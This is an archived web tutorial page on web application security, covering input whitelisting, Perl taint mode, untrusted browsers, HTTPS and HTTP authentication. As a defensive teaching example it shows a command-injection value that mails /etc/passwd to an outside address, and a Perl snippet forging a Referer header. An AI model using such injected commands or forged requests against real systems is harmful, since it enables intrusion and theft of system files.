JumpStart to the Web technologies tutorial: Web = security

From: Subject: JumpStart to the Web technologies tutorial: Web security Date: Thu, 14 Nov 2002 10:48:31 +0100 MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_NextPart_000_0027_01C28BCB.5F78F620"; type="text/html" X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 This is a multi-part message in MIME format. ------=_NextPart_000_0027_01C28BCB.5F78F620 Content-Type: text/html; charset="Windows-1252" Content-Transfer-Encoding: quoted-printable Content-Location: http://www.sergey.com/web_course/part_12.html JumpStart to the Web technologies tutorial: Web = security

Jumpstart into=20 the Web technologies:	<- Prev.	Start	Contents	References	Home	Next=20 ->

Web=20 security

Web=20 applications as a world's biggest security hole=20
What is=20 permitted?=20
Perl's=20 taint mode=20
Do = not=20 trust the browser!=20
HTTPS /=20 SSL=20
Authentic= ation=20
Summary=20

Why is Web applications (CGI, Application servers etc.) the = world's=20 biggest security hole?=20

Some unknown person from unknown location anywhere in = the world=20 is running a program on your computer...
... If this program = is doing=20 ONLY what you think it does, you are lucky, but are you really sure if = this is=20 the case? :-)=20

Good real life example is the finger service gateway, which was = distributed=20 with the first versions of NCSA httpd. It just took the parameter from = the=20 form(let's say 'name') and run 'finger $name'. = What=20 happens if $name is:
'guest; /bin/mail = bad@company.com=20 < /etc/passwd' ? Whoops...=20

Important security questions, which should be asked:=20

What is needed to be protected? It can be:=20
- Our data=20
- Customers / third party data=20
- Service=20
- Our reputation (we don't want somebody to deface our site or use = it to=20 launch an attack on somebody else)
Against whom should it be protected?=20
What is the real value?

You should build your security = according=20 to the answers to these questions. e.g. it would be probably overkill to = encrypt=20 all the users' data if all you gathering is users' nicknames. But if you = have=20 users' credit cards info, SS numbers etc. you may want to consider = keeping it=20 encrypted on your system.=20

Two possible positions in your security=20 policy:=20

Everything explicitly not permitted is forbidden. Make a = list of=20 the things you permit and forbid everything else. Even if you forget=20 something, somebody will get an error message and send you an email = asking to=20 fix it, nothing terrible happens.
e.g. an input allowed symbols are = letters, numbers & underscore:
$input =3D~ = tr/A-Za-z0-9_//cd; #=20 delete all the rest=20
Everything explicitly not forbidden is permitted. Make a = list of=20 what is forbidden. What happens if you forget to forbid something?=20 Whoops...
e.g. Same problem as previous, but now we create a list = of=20 forbidden symbols: '!@#$%^&;'
$input =3D~=20 tr/!@#$%^&;//d; # delete these symbols
But we forgot to = add=20 '|' to the list. Whoops...

Always use = 'Everything explicitly not permitted is forbidden.'!

Perl taint mode (perl -T)

If running perl with '-T' option, perl forces "taint" = checks.=20 The idea behind these checks is the following:=20

Data from the sources we can't trust (any external sources) is = unsafe=20 (tainted).=20
Any data which was created using some tainted data is tainted as = well.=20
Some operations are unsafe (e.g. running external programs, = writing to=20 disk etc.)=20
You shouldn't run unsafe operations with tainted data. =

The way=20 it's working is that perl keeps track of all the variables and = knows,=20 which one is tainted and which one is not. If program tries to use = tainted data=20 in an unsafe operation, program will abort. There are special ways to do = the=20 laundering of the tainted data, so each time you want to use the tainted = data=20 you need explicitely clean it. Note here, that of course you can just = untaint=20 the data, without checking, but this mechanism reminds you that you need = to do=20 the validation.=20

You can use Ta= int.pm=20 module to work with Perl's taint mode.
More info on taint mode can be = found=20 at perlsec manpage (man perlsec).
All CGI = programs=20 should be run in a taint mode.

Do not trust the browser!

The browser is not under your control, so you can't trust it. It = means the=20 following:=20

You can't trust the client-side form validation. Let's = assume, that=20 you have a client-side JavaScript function, which validates the user's = input,=20 what happends if user disables JavaScript?... Always validate on the = server=20 side.=20
Form can be altered. It means, that hidden fields can be = changed,=20 menus can be altered, any field can be changed. Consider the following = example: you have a shopping cart, when user proceeds to the checkout = you=20 transfer the total price along with other parameters as a hidden form=20 parameter ('price') in the acknowledge screen. After user hits "agree" = button=20 CGI program takes the 'price' from the form and debits his credit=20 card.
Guess what? Somebody can take the acknowledge screen, save it = on his=20 computer, alter the price parameter (let say $10 instead of $1500) and = press=20 the button in his version of your form... Somebody just bought a nice = product=20 for $10 instead of $1500, nice sale :-)=20
You can't trust a browser to sent variables. Let's say in = the=20 previous example we decided to check HTTP_REFERER variable to = ensure,=20 that user comes from our acknowledge screen. Unfortunately it's not = going to=20 help us, because somebody can write his own 'browser' to fool us. e.g. = using=20 the perl with LWP module you can do this:
```
  $req =3D new =
HTTP::Request POST;
  $req->url('http://www.company.com/cgi-bin/process.cgi');
  $req->header('Referer' =3D> =
'http://www.company.com/cgi-bin/ack.cgi');
  ...
```

HTTPS / SSL

Since we are sending over the Internet sensitive info, we don't want = bad guys=20 to see it if they put some sniffer in the middle. Help comes from Secure = Sockets=20 Layer (SSL). HTTPS is a secure version of HTTP, actually it's the same = HTTP, but=20 transfered over the encrypted channel of SSL. When we ask for the URL, = which=20 starts with 'https://', browser connects to the https daemon = (usually=20 on port 443) and they create the secure SSL channel over which they = speak=20 HTTP.
The way SSL works is the following:=20

Each browser have a build-in list of the Certifying Authorities = (CA).=20
Browser connects to the server.=20
Server sends to the browser its digital certificate, which states = who this=20 is and contains server's public encryption key. It is signed by some = CA.=20
Browser checks the certificate using the public key of the CA to = ensure,=20 that it's the right certificate.=20
Using the server's public encryption key browser & server = negotiate=20 the session key.=20
After the session key is agreed upon, all the data, which goes = over the=20 secure channel is encrypted with this key.

Note, that if the = server's=20 digital certificate is signed by unknown to the browser CA, it'll prompt = user to=20 manually verify if the certificate is Ok.=20

It's also worthwhile to note here, that HTTPS adds the load on the = server and=20 client since it adds the encryption, so it may be a good idea to use it = only=20 when you absolutely need to. For example if your site has a public press = releases section, it's probably doesn't need to use HTTPS.=20

More info on the cryptography can be found at the Cryptography FAQ. =

Authentication

In many cases we need to authenticate the user. How can we do it?=20

Basic httpd authentication. The way it's working is:=20
1. It's configured on the server side for httpd (e.g. .htaccess = file).=20
2. Client tries to access the page.=20
3. HTTPD sends status code 401 (Unauthorised) and type of = authentication=20 required (basic in this case).=20
4. Browser prompts user for the username and password=20 (credentials) and resends the same request as before, but = with=20 credentials
  ('Authorization: Basic <encoded=20 credentials>')=20
5. HTTPD checks the credentials and if everything is Ok delivers = the page.=20
The encoding mechanism for the credentials is really = simple to=20 decode. It just concatenates username & password with = ':' and=20 does base-64 encoding. So it's not very secure, since if somebody is = listening=20 on your network he'll easy see it. The plus is that this is supported = by any=20 browser.=20
Digest Authentication. ('AuthType Digest' in = .htaccess=20 file). Working similar to basic, but client instead of sending the = username=20 & password as credentials, uses MD5 digest to generate the = credentials.=20 Server after receiving it generates the same digest based on its = version of=20 username & password and compares two digests. More info on Digest=20 Authentication can be found in RFC 2069=20
Using the session ID. You can create form, which will ask = user for=20 username & password, check it and if everything is Ok set the = session ID,=20 which should be kept for the whole session. For info on how to keep = session=20 state in CGI, click here.= Note,=20 that if you use the cookies to keep the session ID it can be = intercepted on=20 the network, but, since this ID is per session it's a lower risk than = if=20 username/password intercepted.
If you plan to use cookies to store = the=20 username it's a good idea to use some type of encryption as well, so = they=20 can't be forged.

Summary:=20

Web applications are the world's biggest security hole.=20
Always use 'Everything explicitely not permitted is forbidden'.=20
Never trust the browser.=20
Use Perl's taint mode in CGI programs.=20
Use HTTPS to transfer the sensitive data.=20
Secure your server. This is the big topic by itself, it's out of = the scope=20 of this course, but you need to remember to secure your server :-) =

More info on Web security can be found = here.=20

Jumpstart into=20 the Web technologies:	<- Prev.	Start	Contents	References	Home	Next=20 ->

Copyright =A9 2000 Sergey=20 Gribov ------=_NextPart_000_0027_01C28BCB.5F78F620 Content-Type: text/css; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Content-Location: http://www.sergey.com/web_course/style.css .toolbar1 { PADDING-RIGHT: 3pt; PADDING-LEFT: 3pt; FONT-WEIGHT: bold; FONT-SIZE: = 8pt; PADDING-BOTTOM: 1pt; COLOR: #002255; PADDING-TOP: 1pt; FONT-FAMILY: = Tahoma, Arial, sans-serif } .toolbar2 { PADDING-RIGHT: 4pt; PADDING-LEFT: 4pt; FONT-WEIGHT: bold; FONT-SIZE: = 8pt; PADDING-BOTTOM: 1pt; COLOR: navy; PADDING-TOP: 1pt; FONT-FAMILY: = Tahoma, Arial, sans-serif } .title1 { PADDING-RIGHT: 4pt; PADDING-LEFT: 4pt; FONT-WEIGHT: bold; FONT-SIZE: = x-large; PADDING-BOTTOM: 7pt; COLOR: navy; PADDING-TOP: 10pt; = TEXT-ALIGN: center } .title2 { PADDING-RIGHT: 4pt; PADDING-LEFT: 4pt; FONT-WEIGHT: bold; FONT-SIZE: = x-large; PADDING-BOTTOM: 7pt; COLOR: navy; PADDING-TOP: 10pt; = TEXT-ALIGN: center; TEXT-DECORATION: underline } P { PADDING-RIGHT: 5pt; PADDING-LEFT: 5pt; PADDING-BOTTOM: 7pt; = PADDING-TOP: 7pt } ------=_NextPart_000_0027_01C28BCB.5F78F620 Content-Type: application/octet-stream Content-Transfer-Encoding: quoted-printable Content-Location: http://www.sergey.com/web_course/navig.js =0A= // Navigation function to go to the next / previous page=0A= // n is offset (1, -1 etc.)=0A= function goto_page (n) {=0A= var first =3D 0;=0A= var last =3D 14; // should be the next after the last one=0A= var part_name =3D "part_";=0A= var loc =3D window.location.href;=0A= var re =3D /(.*)\/(\w+)\.html([^\/]*)$/;=0A= var ra =3D re.exec(loc);=0A= =0A= // may be it ends with '/' instead of index.html=0A= if (ra =3D=3D null) {=0A= ra =3D re.exec(loc + "index.html");=0A= }=0A= var path =3D ra[1];=0A= var fname =3D ra[2]; =0A= =0A= // alert("=3D=3D" + ra[1] + "=3D=3D" + ra[2] + "=3D=3D" + ra[3]);=0A= =0A= if (n !=3D -1 && n !=3D 1) {=0A= alert("Hmmm... Wrong parameter to goto_page()...");=0A= }=0A= else if (fname =3D=3D "index" || fname =3D=3D "content") {=0A= if (n =3D=3D -1) {=0A= window.location.href =3D path + "/index.html";=0A= }=0A= else { // +1=0A= window.location.href =3D path + "/" + part_name + "1.html";=0A= }=0A= }=0A= else if (fname =3D=3D "reference") {=0A= if (n =3D=3D -1) {=0A= window.location.href =3D path + "/" + part_name + last + ".html";=0A= }=0A= else { // +1=0A= window.location.href =3D path + "/reference.html";=0A= }=0A= }=0A= else {=0A= var re1 =3D new RegExp("^" + part_name + "(\\d+)");=0A= var ra1 =3D re1.exec(fname);=0A= var num =3D parseInt(ra1[1]);=0A= if (num !=3D null) {=0A= num +=3D n;=0A= if (num > last) {=0A= window.location.href =3D path + "/reference.html";=0A= }=0A= else if (num <=3D first) {=0A= window.location.href =3D path + "/index.html";=0A= }=0A= else {=0A= window.location.href =3D path + "/" + part_name + num + ".html";=0A= }=0A= }=0A= else {=0A= alert("Hmmm... the filename " + fname + " looks strange...");=0A= }=0A= }=0A= }=0A= ------=_NextPart_000_0027_01C28BCB.5F78F620--